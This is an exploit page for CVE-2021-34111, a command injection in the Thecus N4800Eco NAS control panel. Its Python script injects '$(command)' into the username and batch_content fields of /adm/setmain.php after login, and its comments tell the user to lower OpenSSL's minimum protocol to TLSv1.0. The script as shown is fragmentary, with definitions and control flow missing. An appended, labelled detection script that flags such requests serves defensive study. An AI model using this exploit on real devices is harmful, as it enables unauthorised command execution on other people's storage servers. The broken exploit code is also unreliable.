CVE-2021-34111: Thecus N4800Eco NAS Server Control Panel Command Injection

Thecus 4800Eco was discovered to contain a command injection vulnerability via the username parameter in /adm/setmain.php.


# To fix SSL error that occurs when script is started.

# 1- Open /etc/ssl/openssl.cnf file

# At the bottom of the file:

# 2- Set value of MinProtocol as TLSv1.0

def readResult(s, target):

"params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'

url = "https://" + target + "/adm/setmain.php"

resultReq = s.post(url, data=d, verify=False)

dict = resultReq.text.split()

print("[+] Reading system log…\n")

#Set your command output range

def delUser(s, target, command):

"username": "$("+command+")"

url = "https://" + target + "/adm/setmain.php?fun=setlocaluser"

delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

if 'Local User remove succeeds' in delUserReq.text:

print('[+] %s command was executed successfully' % command)

print('[-] %s command was not executed!' %command)

def addUser(s, target, command):

d = {'batch_content': '%24('+command+')%2C22222%2C9999'}

url = "https://" + target + "/adm/setmain.php?fun=setbatch"

addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

if 'Users and groups were created successfully.' in addUserReq.text:

print('[+] Users and groups were created successfully')

print('[-] Users and groups were not created')

delUser(s, target, command)

def login(target, username, password, command=None):

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

"option": "com_extplorer"

url = "https://" + target + "/adm/login.php"

loginReq = s.post(url, data=d, allow_redirects=False, verify=False)

if '"success":true' in loginReq.text:

print('[+] Authentication successful')

elif '"success":false' in loginReq.text:

print('[-] Authentication failed!')

print('[-] Something went wrong!')

addUser(s, target, command)

print("usage: %s targetIp:port username password command" % (args[0]))

print("Example 192.168.1.13:80 admin admin id")

login(target=args[1], username=args[2], password=args[3], command=args[4])

if __name__ == "__main__":
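
A detection-side companion to the requests the script above sends, added here as an example and not part of the original advisory or script: it flags POSTs to /adm/setmain.php whose username (fun=setlocaluser) or batch_content (fun=setbatch) field carries shell command substitution. It assumes the form body is available to the detector, for instance from a reverse proxy in front of the NAS; flag_request, scan and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Shell command substitution: $(...) or backticks.
SUBSTITUTION = re.compile(r"\$\(|`")

# fun= value -> form field that carries the injected string in the script above.
WATCHED = {"setlocaluser": "username", "setbatch": "batch_content"}

def flag_request(method, url, body):
    """Return decoded values of watched fields that contain shell substitution."""
    parts = urlsplit(url)
    if method != "POST" or parts.path != "/adm/setmain.php":
        return []
    fun = parse_qs(parts.query).get("fun", [""])[0]
    field = WATCHED.get(fun)
    if field is None:
        return []
    hits = []
    for value in parse_qs(body, keep_blank_values=True).get(field, []):
        # parse_qs removes one layer of percent-encoding. The batch payload is
        # already encoded before the HTTP client encodes it again, so decode
        # once more or "%24(" slips past the pattern.
        twice = unquote(value)
        if SUBSTITUTION.search(value) or SUBSTITUTION.search(twice):
            hits.append(twice)
    return hits

# Constructed sample requests (method, URL, form body); "id" is the page's
# own example command. Assumption: the detector sees the raw form body.
SAMPLE = [
    ("POST", "/adm/setmain.php?fun=setlocaluser", "username=%24%28id%29"),
    ("POST", "/adm/setmain.php?fun=setbatch",
     "batch_content=%2524%28id%29%252C22222%252C9999"),
    ("POST", "/adm/setmain.php?fun=setlocaluser", "username=alice"),
    ("GET", "/adm/login.php", ""),
]

def scan(records):
    """Return (url, hits) for every record that trips the check."""
    return [(u, h) for m, u, b in records if (h := flag_request(m, u, b))]

if __name__ == "__main__":
    for url, hits in scan(SAMPLE):
        print("ALERT", url, hits)
```

The second sample is the case a single-decode rule misses: the body arrives double-encoded, so the `$(` only appears after the second decode.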
